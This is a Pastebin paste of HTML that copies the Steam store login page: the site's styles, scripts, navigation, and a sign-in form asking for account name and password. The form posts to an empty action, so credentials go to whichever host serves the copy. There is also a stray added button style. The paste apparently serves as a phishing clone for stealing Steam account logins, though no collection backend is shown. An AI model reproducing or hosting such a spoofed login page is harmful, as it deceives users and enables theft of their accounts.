Advertisement
Guest User

Untitled

a guest
Aug 6th, 2017
73
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 67.63 KB | None | 0 0
  1. <html><head>
  2.  
  3. <title>Login</title>
  4. <link rel="shortcut icon" href="https://steamcommunity.com/favicon.ico" type="image/x-icon">
  5. <link href="https://steamstore-a.akamaihd.net/public/shared/css/motiva_sans.css?v=qIG_iZC1Vj_d" rel="stylesheet" type="text/css">
  6. <link href="https://steamstore-a.akamaihd.net/public/shared/css/shared_global.css?v=zz4lBz9qcZ-3" rel="stylesheet" type="text/css">
  7. <link href="https://steamstore-a.akamaihd.net/public/shared/css/buttons.css?v=DivqMdJb8hoZ" rel="stylesheet" type="text/css">
  8. <link href="https://steamstore-a.akamaihd.net/public/css/v6/store.css?v=RSE-A8kDy2YK" rel="stylesheet" type="text/css">
  9. <link href="https://steamstore-a.akamaihd.net/public/css/v6/cart.css?v=jQCjCcsUh1JG" rel="stylesheet" type="text/css">
  10. <link href="https://steamstore-a.akamaihd.net/public/css/v6/browse.css?v=z1oC_UlM7fzC" rel="stylesheet" type="text/css">
  11. <link href="https://steamstore-a.akamaihd.net/public/css/v6/login.css?v=GveAPCmqWjvf" rel="stylesheet" type="text/css">
  12. <link href="https://steamstore-a.akamaihd.net/public/shared/css/login.css?v=C73T6yQ8V-sA" rel="stylesheet" type="text/css">
  13. <script async="" src="//www.google-analytics.com/analytics.js"></script><script>
  14. (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
  15. (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
  16. m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
  17. })(window,document,'script','//www.google-analytics.com/analytics.js','ga');
  18.  
  19. ga('create', 'UA-33786258-1', 'auto', {
  20. 'sampleRate': 0.4 });
  21. ga('set', 'dimension1', false );
  22. ga('set', 'dimension2', 'External' );
  23. ga('set', 'dimension3', 'login' );
  24. ga('set', 'dimension4', "login\/DefaultAction" );
  25. ga('send', 'pageview');
  26.  
  27.  
  28.  
  29. <style>
  30. .button53 {
  31. background-color: Transparent;
  32. background-repeat:no-repeat;
  33. border: none;
  34. cursor:pointer;
  35. overflow: hidden;
  36. outline:none;
  37. }
  38. </style>
  39.  
  40.  
  41.  
  42. </script>
  43. <script type="text/javascript" src="https://steamstore-a.akamaihd.net/public/shared/javascript/jquery-1.8.3.min.js?v=.TZ2NKhB-nliU"></script>
  44. <script type="text/javascript">$J = jQuery.noConflict();</script><script type="text/javascript" src="https://steamstore-a.akamaihd.net/public/shared/javascript/tooltip.js?v=.gcRSUfx-SLlh"></script>
  45.  
  46. <script type="text/javascript" src="https://steamstore-a.akamaihd.net/public/shared/javascript/shared_global.js?v=Wmp-fWrxTw6K&amp;l=english"></script>
  47.  
  48. <script type="text/javascript" src="https://steamstore-a.akamaihd.net/public/javascript/main.js?v=RTgbSyN8kiMo&amp;l=english"></script>
  49.  
  50. <script type="text/javascript" src="https://steamstore-a.akamaihd.net/public/javascript/dynamicstore.js?v=pGqRyTzej--n&amp;l=english"></script>
  51.  
  52. <script type="text/javascript">
  53. jQuery(document).ready(function($) { $J.data( document, 'x_readytime', new Date().getTime() );
  54. $J.data( document, 'x_oldref', GetNavCookie() );
  55. $('.tooltip').v_tooltip();
  56. window.BindStoreTooltip = function( $Selector ) { $Selector.v_tooltip( {'tooltipClass': 'store_tooltip', 'dataName': 'storeTooltip' } ); };
  57. BindStoreTooltip( $('[data-store-tooltip]') );
  58. });</script> <script type="text/javascript" src="https://steamstore-a.akamaihd.net/public/shared/javascript/login.js?v=i540mGHFtw2z&amp;l=english"></script>
  59. <script language="Javascript">
  60. $J( function() {
  61. var LoginManger = new CLoginPromptManager( 'https://store.steampowered.com/', {
  62. strRedirectURL: "http:\/\/store.steampowered.com\/",
  63. gidCaptcha: -1 } );
  64.  
  65. document.forms['logon'].elements['username'].focus();
  66.  
  67. } );
  68. </script>
  69. </head>
  70.  
  71. <body class="v6 login">
  72.  
  73. <div id="global_header">
  74. <div class="content">
  75.  
  76. <div class="logo">
  77. <span id="logo_holder">
  78. <a href="http://store.steampowered.com/">
  79. <img src="https://steamstore-a.akamaihd.net/public/shared/images/header/globalheader_logo.png?t=962016" width="176" height="44">
  80. </a>
  81. </span>
  82. <!--[if lt IE 7]>
  83. <style type="text/css">
  84. #logo_holder img { filter:progid:DXImageTransform.Microsoft.Alpha(opacity=0); }
  85. #logo_holder { display: inline-block; width: 176px; height: 44px; filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='https://steamstore-a.akamaihd.net/public/images/v5/globalheader_logo.png'); }
  86. </style>
  87. <![endif]-->
  88. </div>
  89.  
  90. <div class="supernav_container">
  91. <a class="menuitem supernav" href="http://store.steampowered.com/" data-tooltip-type="selector" data-tooltip-content=".submenu_store">
  92. STORE </a>
  93. <div class="submenu_store" style="display: none;" data-submenuid="store">
  94. <a class="submenuitem" href="http://store.steampowered.com/">Featured</a>
  95. <a class="submenuitem" href="http://store.steampowered.com/explore/">Explore</a>
  96. <a class="submenuitem" href="http://store.steampowered.com/curators/">Curators</a>
  97. <a class="submenuitem" href="http://steamcommunity.com/my/wishlist/">Wishlist</a>
  98. <a class="submenuitem" href="http://store.steampowered.com/news/">News</a>
  99. <a class="submenuitem" href="http://store.steampowered.com/stats/">Stats</a>
  100. </div>
  101.  
  102.  
  103. <a class="menuitem supernav" style="display: block" href="http://steamcommunity.com/" data-tooltip-type="selector" data-tooltip-content=".submenu_community">
  104. COMMUNITY </a>
  105. <div class="submenu_community" style="display: none;" data-submenuid="community">
  106. <a class="submenuitem" href="http://steamcommunity.com/">Home</a>
  107. <a class="submenuitem" href="http://steamcommunity.com/discussions/">Discussions</a>
  108. <a class="submenuitem" href="http://steamcommunity.com/workshop/">Workshop</a>
  109. <a class="submenuitem" href="http://steamcommunity.com/market/">Market</a>
  110. <a class="submenuitem" href="http://steamcommunity.com/?subsection=broadcasts">Broadcasts</a>
  111. </div>
  112.  
  113.  
  114.  
  115.  
  116. <a class="menuitem" href="http://store.steampowered.com/about/">
  117. ABOUT </a>
  118.  
  119. <a class="menuitem" href="https://help.steampowered.com/en/">
  120. SUPPORT </a>
  121. </div>
  122. <script type="text/javascript">
  123. jQuery(function($) {
  124. $('.tooltip').v_tooltip();
  125. $('#global_header .supernav').v_tooltip({'location':'bottom', 'tooltipClass': 'supernav_content', 'offsetY':-4, 'offsetX': 1, 'horizontalSnap': 4, 'tooltipParent': '#global_header .supernav_container', 'correctForScreenSize': false});
  126. });
  127. </script>
  128.  
  129. <div id="global_actions">
  130. <div id="global_action_menu">
  131. <div class="header_installsteam_btn header_installsteam_btn_green">
  132. <div class="header_installsteam_btn_leftcap"></div>
  133. <div class="header_installsteam_btn_rightcap"></div>
  134. <a class="header_installsteam_btn_content" href="http://store.steampowered.com/about/">
  135. Install Steam </a>
  136. </div>
  137.  
  138.  
  139. <a class="global_action_link" href="https://store.steampowered.com//login/?redir=login%2F%3Fredir%3D&amp;redir_ssl=1">login</a>
  140. &nbsp;|&nbsp;
  141. <span class="pulldown global_action_link" id="language_pulldown" onclick="ShowMenu( this, 'language_dropdown', 'right' );">language</span>
  142. <div class="popup_block_new" id="language_dropdown" style="display: none;">
  143. <div class="popup_body popup_menu">
  144. <a class="popup_menu_item tight" href="?l=bulgarian&amp;redir=" onclick="ChangeLanguage( 'bulgarian' ); return false;">Български (Bulgarian)</a>
  145. <a class="popup_menu_item tight" href="?l=czech&amp;redir=" onclick="ChangeLanguage( 'czech' ); return false;">čeština (Czech)</a>
  146. <a class="popup_menu_item tight" href="?l=danish&amp;redir=" onclick="ChangeLanguage( 'danish' ); return false;">Dansk (Danish)</a>
  147. <a class="popup_menu_item tight" href="?l=dutch&amp;redir=" onclick="ChangeLanguage( 'dutch' ); return false;">Nederlands (Dutch)</a>
  148. <a class="popup_menu_item tight" href="?l=finnish&amp;redir=" onclick="ChangeLanguage( 'finnish' ); return false;">Suomi (Finnish)</a>
  149. <a class="popup_menu_item tight" href="?l=french&amp;redir=" onclick="ChangeLanguage( 'french' ); return false;">Français (French)</a>
  150. <a class="popup_menu_item tight" href="?l=greek&amp;redir=" onclick="ChangeLanguage( 'greek' ); return false;">Ελληνικά (Greek)</a>
  151. <a class="popup_menu_item tight" href="?l=german&amp;redir=" onclick="ChangeLanguage( 'german' ); return false;">Deutsch (German)</a>
  152. <a class="popup_menu_item tight" href="?l=hungarian&amp;redir=" onclick="ChangeLanguage( 'hungarian' ); return false;">Magyar (Hungarian)</a>
  153. <a class="popup_menu_item tight" href="?l=italian&amp;redir=" onclick="ChangeLanguage( 'italian' ); return false;">Italiano (Italian)</a>
  154. <a class="popup_menu_item tight" href="?l=japanese&amp;redir=" onclick="ChangeLanguage( 'japanese' ); return false;">日本語 (Japanese)</a>
  155. <a class="popup_menu_item tight" href="?l=koreana&amp;redir=" onclick="ChangeLanguage( 'koreana' ); return false;">한국어 (Korean)</a>
  156. <a class="popup_menu_item tight" href="?l=norwegian&amp;redir=" onclick="ChangeLanguage( 'norwegian' ); return false;">Norsk (Norwegian)</a>
  157. <a class="popup_menu_item tight" href="?l=polish&amp;redir=" onclick="ChangeLanguage( 'polish' ); return false;">Polski (Polish)</a>
  158. <a class="popup_menu_item tight" href="?l=portuguese&amp;redir=" onclick="ChangeLanguage( 'portuguese' ); return false;">Português (Portuguese)</a>
  159. <a class="popup_menu_item tight" href="?l=brazilian&amp;redir=" onclick="ChangeLanguage( 'brazilian' ); return false;">Português-Brasil (Portuguese-Brazil)</a>
  160. <a class="popup_menu_item tight" href="?l=russian&amp;redir=" onclick="ChangeLanguage( 'russian' ); return false;">Русский (Russian)</a>
  161. <a class="popup_menu_item tight" href="?l=romanian&amp;redir=" onclick="ChangeLanguage( 'romanian' ); return false;">Română (Romanian)</a>
  162. <a class="popup_menu_item tight" href="?l=schinese&amp;redir=" onclick="ChangeLanguage( 'schinese' ); return false;">简体中文 (Simplified Chinese)</a>
  163. <a class="popup_menu_item tight" href="?l=spanish&amp;redir=" onclick="ChangeLanguage( 'spanish' ); return false;">Español (Spanish)</a>
  164. <a class="popup_menu_item tight" href="?l=swedish&amp;redir=" onclick="ChangeLanguage( 'swedish' ); return false;">Svenska (Swedish)</a>
  165. <a class="popup_menu_item tight" href="?l=tchinese&amp;redir=" onclick="ChangeLanguage( 'tchinese' ); return false;">繁體中文 (Traditional Chinese)</a>
  166. <a class="popup_menu_item tight" href="?l=thai&amp;redir=" onclick="ChangeLanguage( 'thai' ); return false;">ไทย (Thai)</a>
  167. <a class="popup_menu_item tight" href="?l=turkish&amp;redir=" onclick="ChangeLanguage( 'turkish' ); return false;">Türkçe (Turkish)</a>
  168. <a class="popup_menu_item tight" href="?l=ukrainian&amp;redir=" onclick="ChangeLanguage( 'ukrainian' ); return false;">Українська (Ukrainian)</a>
  169. <a class="popup_menu_item tight" href="http://translation.steampowered.com" target="_blank">Help us translate Steam</a>
  170. </div>
  171. </div>
  172. </div>
  173. </div>
  174. </div>
  175. </div>
  176.  
  177. <div class="page_header_ctn search">
  178.  
  179.  
  180.  
  181. <div class="responsive_store_nav_ctn_spacer"><div id="store_header" class="">
  182. <div class="content">
  183. <div id="store_controls">
  184. <div id="cart_status_data">
  185. <div class="store_header_btn_green store_header_btn" id="store_header_cart_btn" style="display: none;">
  186. <div class="store_header_btn_caps store_header_btn_leftcap"></div>
  187. <div class="store_header_btn_caps store_header_btn_rightcap"></div>
  188. <a id="cart_link" class="store_header_btn_content" href="http://store.steampowered.com/cart/?snr=1_60_4__12">
  189. Cart (<span id="cart_item_count_value">0</span>)
  190. </a>
  191. </div>
  192. </div>
  193. </div>
  194. <div id="store_nav_area">
  195. <div class="store_nav_leftcap"></div>
  196. <div class="store_nav_bg">
  197. <div class="store_nav">
  198.  
  199. <div class="tab flyout_tab " id="foryou_tab" data-flyout="foryou_flyout" data-flyout-align="left" data-flyout-valign="bottom" onmouseover="EnsureStoreMenuTagsLoaded( '#foryou_yourtags' );">
  200. <span class="pulldown">
  201. <a class="pulldown_desktop" href="http://store.steampowered.com/?snr=1_60_4__12">Your Store</a>
  202. <span></span>
  203. </span>
  204. </div>
  205. <div class="popup_block_new flyout_tab_flyout responsive_slidedown" id="foryou_flyout" style="display: none;">
  206. <div class="popup_body popup_menu">
  207. <a class="popup_menu_item" href="http://store.steampowered.com/?snr=1_60_4__12">
  208. Store Home </a>
  209. <div class="hr"></div>
  210. <a class="popup_menu_item" href="http://store.steampowered.com/recommended/?snr=1_60_4__12">
  211. Recently viewed </a>
  212. <a class="popup_menu_item" href="http://store.steampowered.com/curators/topcurators/?snr=1_60_4__12">
  213. Steam Curators </a>
  214. <a class="popup_menu_item" href="http://store.steampowered.com/updated/all/?snr=1_60_4__12">
  215. Recently updated </a>
  216. </div>
  217. </div>
  218.  
  219.  
  220. <div class="tab flyout_tab" id="genre_tab" data-flyout="genre_flyout" data-flyout-align="left" data-flyout-valign="bottom">
  221. <span class="pulldown">
  222. <a class="pulldown_desktop" href="http://store.steampowered.com/games/?snr=1_60_4__12">Games</a>
  223. <a class="pulldown_mobile" href="#">Games</a>
  224. <span></span>
  225. </span>
  226. </div>
  227. <div class="popup_block_new flyout_tab_flyout responsive_slidedown" id="genre_flyout" style="visibility: visible; top: 42px; left: 115.688px; display: none; opacity: 1;">
  228. <div class="popup_body popup_menu">
  229. <a class="popup_menu_item" href="http://store.steampowered.com/genre/Free%20to%20Play/?snr=1_60_4__12">
  230. Free to Play </a>
  231. <a class="popup_menu_item" href="http://store.steampowered.com/genre/Early%20Access/?snr=1_60_4__12">
  232. Early Access </a>
  233. <a class="popup_menu_item" href="http://store.steampowered.com/freestuff/demos/?snr=1_60_4__12">
  234. <span>Demos</span>
  235. </a>
  236. <a class="popup_menu_item" href="http://store.steampowered.com/vr/?snr=1_60_4__12">
  237. <span>Virtual Reality</span>
  238. </a>
  239. <a class="popup_menu_item" href="http://store.steampowered.com/controller/?snr=1_60_4__12">
  240. <span>Steam Controller</span>
  241. </a>
  242. <div class="hr"></div>
  243. <div class="popup_menu_subheader">Browse by genre:</div>
  244.  
  245. <a class="popup_menu_item" href="http://store.steampowered.com/tag/en/Action/?snr=1_60_4__12">
  246. Action </a>
  247. <a class="popup_menu_item" href="http://store.steampowered.com/tag/en/Adventure/?snr=1_60_4__12">
  248. Adventure </a>
  249. <a class="popup_menu_item" href="http://store.steampowered.com/tag/en/Casual/?snr=1_60_4__12">
  250. Casual </a>
  251. <a class="popup_menu_item" href="http://store.steampowered.com/tag/en/Indie/?snr=1_60_4__12">
  252. Indie </a>
  253. <a class="popup_menu_item" href="http://store.steampowered.com/tag/en/Massively%20Multiplayer/?snr=1_60_4__12">
  254. Massively Multiplayer </a>
  255. <a class="popup_menu_item" href="http://store.steampowered.com/tag/en/Racing/?snr=1_60_4__12">
  256. Racing </a>
  257. <a class="popup_menu_item" href="http://store.steampowered.com/tag/en/RPG/?snr=1_60_4__12">
  258. RPG </a>
  259. <a class="popup_menu_item" href="http://store.steampowered.com/tag/en/Simulation/?snr=1_60_4__12">
  260. Simulation </a>
  261. <a class="popup_menu_item" href="http://store.steampowered.com/tag/en/Sports/?snr=1_60_4__12">
  262. Sports </a>
  263. <a class="popup_menu_item" href="http://store.steampowered.com/tag/en/Strategy/?snr=1_60_4__12">
  264. Strategy </a>
  265.  
  266. <div class="hr"></div>
  267. <a class="popup_menu_item" href="http://store.steampowered.com/tag/browse/?snr=1_60_4__12">
  268. See popular tags </a>
  269. <div class="hr"></div>
  270. <div class="popup_menu_subheader">Browse by platform:</div>
  271. <a class="popup_menu_item" href="http://store.steampowered.com/macos?snr=1_60_4__12">
  272. Mac OS X </a>
  273. <a class="popup_menu_item" href="http://store.steampowered.com/linux?snr=1_60_4__12">
  274. SteamOS + Linux </a>
  275. </div>
  276. </div>
  277.  
  278. <div class="tab flyout_tab " id="software_tab" data-flyout="software_flyout" data-flyout-align="left" data-flyout-valign="bottom">
  279. <span class="pulldown">
  280. <a class="pulldown_desktop" href="http://store.steampowered.com/software/?snr=1_60_4__12">Software</a>
  281. <a class="pulldown_mobile" href="#">Software</a>
  282. <span></span>
  283. </span>
  284.  
  285. </div>
  286. <div class="popup_block_new flyout_tab_flyout responsive_slidedown" id="software_flyout" style="display: none;">
  287. <div class="popup_body popup_menu">
  288. <a class="popup_menu_item" href="http://store.steampowered.com/software/?snr=1_60_4__12">
  289. Software Hub </a>
  290. <div class="hr"></div>
  291. <a class="popup_menu_item" href="http://store.steampowered.com/tag/en/Animation%20%26%20Modeling/?snr=1_60_4__12">
  292. Animation &amp; Modeling </a>
  293. <a class="popup_menu_item" href="http://store.steampowered.com/tag/en/Audio%20Production/?snr=1_60_4__12">
  294. Audio Production </a>
  295. <a class="popup_menu_item" href="http://store.steampowered.com/tag/en/Design%20%26%20Illustration/?snr=1_60_4__12">
  296. Design &amp; Illustration </a>
  297. <a class="popup_menu_item" href="http://store.steampowered.com/tag/en/Education/?snr=1_60_4__12">
  298. Education </a>
  299. <a class="popup_menu_item" href="http://store.steampowered.com/tag/en/Game%20Development/?snr=1_60_4__12">
  300. Game Development </a>
  301. <a class="popup_menu_item" href="http://store.steampowered.com/tag/en/Photo%20Editing/?snr=1_60_4__12">
  302. Photo Editing </a>
  303. <a class="popup_menu_item" href="http://store.steampowered.com/tag/en/Utilities/?snr=1_60_4__12">
  304. Utilities </a>
  305. <a class="popup_menu_item" href="http://store.steampowered.com/tag/en/Video%20Production/?snr=1_60_4__12">
  306. Video Production </a>
  307. <a class="popup_menu_item" href="http://store.steampowered.com/tag/en/Web%20Publishing/?snr=1_60_4__12">
  308. Web Publishing </a>
  309.  
  310. </div>
  311. </div>
  312.  
  313. <div class="tab flyout_tab " id="hardware_tab" data-flyout="hardware_flyout" data-flyout-align="left" data-flyout-valign="bottom">
  314. <span class="pulldown">
  315. <a class="pulldown_desktop" href="http://store.steampowered.com/hardware/?snr=1_60_4__12">Hardware</a>
  316. <a class="pulldown_mobile" href="#">Hardware</a>
  317. <span></span>
  318. </span>
  319.  
  320. </div>
  321. <div class="popup_block_new flyout_tab_flyout responsive_slidedown" id="hardware_flyout" style="display: none;">
  322. <div class="popup_body popup_menu">
  323. <a class="popup_menu_item" href="http://store.steampowered.com/app/353370/?snr=1_60_4__12">
  324. Steam Controller </a>
  325. <a class="popup_menu_item" href="http://store.steampowered.com/app/353380/?snr=1_60_4__12">
  326. Steam Link </a>
  327. <a class="popup_menu_item" href="http://store.steampowered.com/hardware/?snr=1_60_4__12#Machines">
  328. Steam Machines </a>
  329. <a class="popup_menu_item" href="http://store.steampowered.com/app/358040/?snr=1_60_4__12">
  330. HTC Vive </a>
  331. </div>
  332. </div>
  333.  
  334. <div class="tab flyout_tab " id="videos_tab" data-flyout="videos_flyout" data-flyout-align="left" data-flyout-valign="bottom">
  335. <span class="pulldown">
  336. <a class="pulldown_desktop" href="http://store.steampowered.com/videos/?snr=1_60_4__12">Videos</a>
  337. <a class="pulldown_mobile" href="#">Videos</a>
  338. <span></span>
  339. </span>
  340.  
  341. </div>
  342. <div class="popup_block_new flyout_tab_flyout responsive_slidedown" id="videos_flyout" style="display: none;">
  343. <div class="popup_body popup_menu">
  344. <a class="popup_menu_item" href="http://store.steampowered.com/videos/?snr=1_60_4__12">
  345. Video Hub </a>
  346. <div class="hr"></div>
  347. <div class="popup_menu_subheader">Browse by type:</div>
  348. <a class="popup_menu_item" href="http://store.steampowered.com/search/?snr=1_60_4__12#category1=992&amp;sort_by=Released_DESC&amp;page=1&amp;tags=4700">
  349. Movie </a>
  350. <a class="popup_menu_item" href="http://store.steampowered.com/search/?snr=1_60_4__12#category1=992&amp;sort_by=Released_DESC&amp;page=1&amp;tags=4242">
  351. Episodic </a>
  352. <a class="popup_menu_item" href="http://store.steampowered.com/search/?snr=1_60_4__12#category1=992&amp;sort_by=Released_DESC&amp;page=1&amp;tags=15339">
  353. Documentary </a>
  354. <a class="popup_menu_item" href="http://store.steampowered.com/search/?snr=1_60_4__12#category1=992&amp;sort_by=Released_DESC&amp;page=1&amp;tags=150626">
  355. Gaming </a>
  356. <a class="popup_menu_item" href="http://store.steampowered.com/search/?snr=1_60_4__12#category1=992&amp;sort_by=Released_DESC&amp;page=1&amp;tags=12057">
  357. Tutorial </a>
  358. <a class="popup_menu_item" href="http://store.steampowered.com/search/?snr=1_60_4__12#category1=992&amp;sort_by=Released_DESC&amp;page=1&amp;tags=4234">
  359. Short </a>
  360.  
  361. <div class="hr"></div>
  362. <div class="popup_menu_subheader">Browse by genre:</div>
  363. <a class="popup_menu_item" href="http://store.steampowered.com/search/?snr=1_60_4__12#category1=992&amp;sort_by=Released_DESC&amp;page=1&amp;tags=19">
  364. Action </a>
  365. <a class="popup_menu_item" href="http://store.steampowered.com/search/?snr=1_60_4__12#category1=992&amp;sort_by=Released_DESC&amp;page=1&amp;tags=4085">
  366. Anime </a>
  367. <a class="popup_menu_item" href="http://store.steampowered.com/search/?snr=1_60_4__12#category1=992&amp;sort_by=Released_DESC&amp;page=1&amp;tags=1719">
  368. Comedy </a>
  369. <a class="popup_menu_item" href="http://store.steampowered.com/search/?snr=1_60_4__12#category1=992&amp;sort_by=Released_DESC&amp;page=1&amp;tags=5984">
  370. Drama </a>
  371. <a class="popup_menu_item" href="http://store.steampowered.com/search/?snr=1_60_4__12#category1=992&amp;sort_by=Released_DESC&amp;page=1&amp;tags=1667">
  372. Horror </a>
  373. <a class="popup_menu_item" href="http://store.steampowered.com/search/?snr=1_60_4__12#category1=992&amp;sort_by=Released_DESC&amp;page=1&amp;tags=3942">
  374. Sci-fi </a>
  375. </div>
  376. </div>
  377.  
  378. <a class="tab " href="http://store.steampowered.com/news/?snr=1_60_4__12">
  379. <span>News</span>
  380. </a>
  381.  
  382. <div class="search_area">
  383. <div id="store_search">
  384. <form id="searchform" name="searchform" method="get" action="https://store.steampowered.com/search/" onsubmit="return SearchSuggestCheckTerm(this);">
  385. <input type="hidden" name="snr" value="1_60_4__12">
  386. <div class="searchbox">
  387. <input id="store_nav_search_term" name="term" type="text" class="default" placeholder="search the store" size="22" autocomplete="off">
  388. <a href="#" id="store_search_link" onclick="var $Form = $J(this).parents('form'); $Form.submit(); return false;"><img src="https://steamstore-a.akamaihd.net/public/images/blank.gif"></a>
  389. </div>
  390. </form>
  391. </div>
  392. <div id="searchterm_options" class="search_suggest popup_block_new" style="display: none;">
  393. <div class="popup_body" style="border-top: none;">
  394. <div id="search_suggestion_contents">
  395. </div>
  396. </div>
  397. </div>
  398. </div>
  399.  
  400. </div>
  401. </div>
  402. <div class="store_nav_rightcap"></div>
  403. </div>
  404. </div>
  405. </div></div>
  406. <script type="text/javascript">
  407. $J( function() {
  408. BindAutoFlyoutEvents();
  409.  
  410. var $Window = $J(window);
  411. var $Header = $J('#store_header');
  412. var $ResponsiveNavCtn = $J('#responsive_store_nav_ctn');
  413. var $HeaderWrapper;
  414. $Window.on('Responsive_SmallScreenModeToggled.StoreMenu', function() {
  415. var bUseSmallScreenMode =window.UseSmallScreenMode && window.UseSmallScreenMode();
  416.  
  417. if ( !$HeaderWrapper )
  418. $HeaderWrapper = $Header.wrap( $J('<div/>', {'class': 'responsive_store_nav_ctn_spacer'} ) ).parent();
  419.  
  420. if ( bUseSmallScreenMode )
  421. $ResponsiveNavCtn.append( $Header );
  422. else
  423. $HeaderWrapper.append( $Header );
  424.  
  425.  
  426. if ( bUseSmallScreenMode )
  427. {
  428. $Header.css( 'visibility', 'hidden' );
  429. $Header.show();
  430. var nMenuHeight = $J('#store_header' ).height() + $J('#store_header' ).offset().top;
  431. if ( $Window.scrollTop() < nMenuHeight )
  432. $Window.scrollTop( nMenuHeight - GetResponsiveHeaderFixedOffsetAdjustment() );
  433.  
  434. $Header.css('visibility', 'visible');
  435. }
  436. } ).trigger('Responsive_SmallScreenModeToggled.StoreMenu');
  437.  
  438. if( $J('#searchform').length > 0 )
  439. {
  440. EnableSearchSuggestions( $J('#searchform')[0].elements['term'], '1_60_4_', 'IL', 'english', '0', '0', '3257176' );
  441. }
  442.  
  443.  
  444. } );
  445. </script>
  446. <script type="text/javascript">
  447. var g_AccountID = 0;
  448. var g_sessionID = "c7a15268f8d390de457829a9";
  449. var g_ServerTime = 1501779646;
  450.  
  451. $J( InitMiniprofileHovers );
  452.  
  453. GDynamicStore.Init( 0, false, "" );
  454. GStoreItemData.SetCurrencyFormatter( function( nValueInCents, bWholeUnitsOnly ) { var fnBase = function( nValueInCents, bWholeUnitsOnly ) { var fmt = function( nValueInCents, bWholeUnitsOnly ) { var format = v_numberformat( nValueInCents / 100, bWholeUnitsOnly ? 0 : 2, ".", ","); return format; };var strNegativeSymbol = ''; if ( nValueInCents < 0 ) { strNegativeSymbol = '-'; nValueInCents = -nValueInCents; }return strNegativeSymbol + "$" + fmt( nValueInCents, bWholeUnitsOnly );}; return fnBase( nValueInCents, bWholeUnitsOnly ) + ' USD'; } );
  455. GStoreItemData.SetCurrencyMinPriceIncrement( 1 );
  456. </script>
  457. <div class="page_content">
  458.  
  459.  
  460. <!-- Center Column -->
  461.  
  462. <div id="error_display" class="checkout_error" style="display: none; color: #cc3300">
  463. </div>
  464.  
  465. <div class="leftcol">
  466.  
  467.  
  468. <div class="checkout_content_box">
  469. <div class="loginbox">
  470. <div class="loginbox_left">
  471. <h2>Sign in</h2>
  472. <p>To an existing Steam account</p>
  473. <br>
  474. <form name="logon" action="" method="POST">
  475. <div class="login_row">
  476. <div class="input_title">Steam account name</div>
  477. <input class="text_input" type="text" name="username" id="input_username" value="">
  478. </div>
  479. <div class="login_row">
  480. <div class="input_title">Password</div>
  481. <input class="text_input" type="password" name="password" id="input_password" autocomplete="off">
  482. </div>
  483. <div class="login_row" id="captcha_entry" style="display: none;">
  484. <div id="captcha_image_row">
  485. <img style="float: left;" id="captchaImg" src="https://steamstore-a.akamaihd.net/public/images/blank.gif" border="0" width="206" height="40">
  486. <div id="captchaRefresh">
  487. <span class="linkspan" id="captchaRefreshLink">Refresh</span>
  488. </div>
  489. <div style="clear: left;"></div>
  490. </div>
  491. <br>
  492. <div class="input_title">Enter the characters above</div>
  493. <input class="text_input" id="input_captcha" type="text" name="captcha_text">
  494. </div>
  495. <div style="display: none;"><input type="submit"></div>
  496. </form>
  497. </div>
  498. <div class="loginbox_sep">
  499. </div>
  500. <div class="loginbox_right">
  501. <h2>Create</h2>
  502. <p>A new free account</p>
  503. <br>
  504. <p>
  505. It's free to join and easy to use. Continue on to create your Steam account and get Steam, the leading digital solution for PC and Mac gamers. </p>
  506. </div>
  507. <div style="clear: left;"></div>
  508. <div class="loginbox_left btn_ctn">
  509. <div id="login_btn_signin" style="display: block;">
  510. <button type="submit" class="btnv6_blue_hoverfade btn_medium">
  511. <span>Sign in</span>
  512. </button>
  513. </div>
  514. <div id="login_btn_wait" style="display: none;">
  515. <img src="https://steamstore-a.akamaihd.net/public/images/login/throbber.gif">
  516. </div>
  517. </div>
  518. <div class="loginbox_right">
  519. <a href="https://store.steampowered.com/join/?&amp;snr=1_60_4__62" class="btnv6_blue_hoverfade btn_medium">
  520. <span>Join Steam</span>
  521. </a>
  522. </div>
  523. <div style="clear: left;"></div>
  524. </div>
  525. </div>
  526. <br>
  527.  
  528.  
  529. <a href="https://help.steampowered.com/en/wizard/HelpWithLogin?redir=store%2Flogin%2F%3Fredir%3D" id="link_forgot_password">
  530. Forgot your password? </a>
  531.  
  532. </div>
  533. <!-- End Center Column -->
  534.  
  535. <!-- Right Column -->
  536. <div class="rightcol">
  537. <div class="block">
  538.  
  539. <div class="block_content block_content_inner login">
  540. <h2>WHY JOIN STEAM?</h2>
  541. <ul id="why_list">
  542. <li>Buy and download full retail games</li>
  543. <li>Join the Steam Community</li>
  544. <li>Chat with your friends while gaming</li>
  545. <li>Play your games on any supported platform</li>
  546. <li>Schedule a game, tournament, or LAN party</li>
  547. <li>Receive automatic game updates, and more!</li>
  548. </ul>
  549. <br>
  550. <img src="https://steamstore-a.akamaihd.net/public/images/v6/why_join_preview.png" width="265" height="176" border="0">
  551. <br><br>
  552. </div>
  553. <br>
  554. <a href="http://store.steampowered.com/about">Learn more about Steam.</a>
  555. </div>
  556. </div>
  557. <!-- End Right Column -->
  558.  
  559. <div style="clear: both;"></div>
  560.  
  561. </div>
  562.  
  563. </div>
  564. <!-- End Main Background -->
  565.  
  566. <div id="loginModals">
  567.  
  568.  
  569. <div class="login_modal loginIPTModal" style="display: none">
  570. <div class="auth_message_area">
  571. <div class="auth_icon ipt_icon">
  572. </div>
  573. <div class="auth_messages">
  574. <div class="auth_message">
  575. <div class="auth_modal_h1">Sorry</div>
  576. <p>This account can't be accessed from this computer without additional authorization.</p>
  577. </div>
  578. </div>
  579. </div>
  580. <div class="auth_details_messages">
  581. <div class="auth_details">
  582. Please contact Steam Support to have a member of our staff assist you. Legitimate claims for help with account access are our number one priority. </div>
  583. </div>
  584. <div class="authcode_entry_area">
  585. </div>
  586. <div class="modal_buttons">
  587. <div class="auth_buttonset">
  588. <a href="https://support.steampowered.com/kb_article.php?ref=9400-IPAX-9398&amp;auth=e39b5c227cffc8ae65414aba013e5fef" class="auth_button leftbtn" data-ajax="false" data-externallink="1">
  589. <div class="auth_button_h3">Learn more</div>
  590. <div class="auth_button_h5">about Intel® Identity Protection Technology</div>
  591. </a>
  592. <a href="https://support.steampowered.com" class="auth_button" data-ajax="false" data-externallink="1">
  593. <div class="auth_button_h3">Please help</div>
  594. <div class="auth_button_h5">I think I need assistance from Steam Support...</div>
  595. </a>
  596. <div style="clear: left;"></div>
  597. </div>
  598. </div>
  599. </div>
  600.  
  601.  
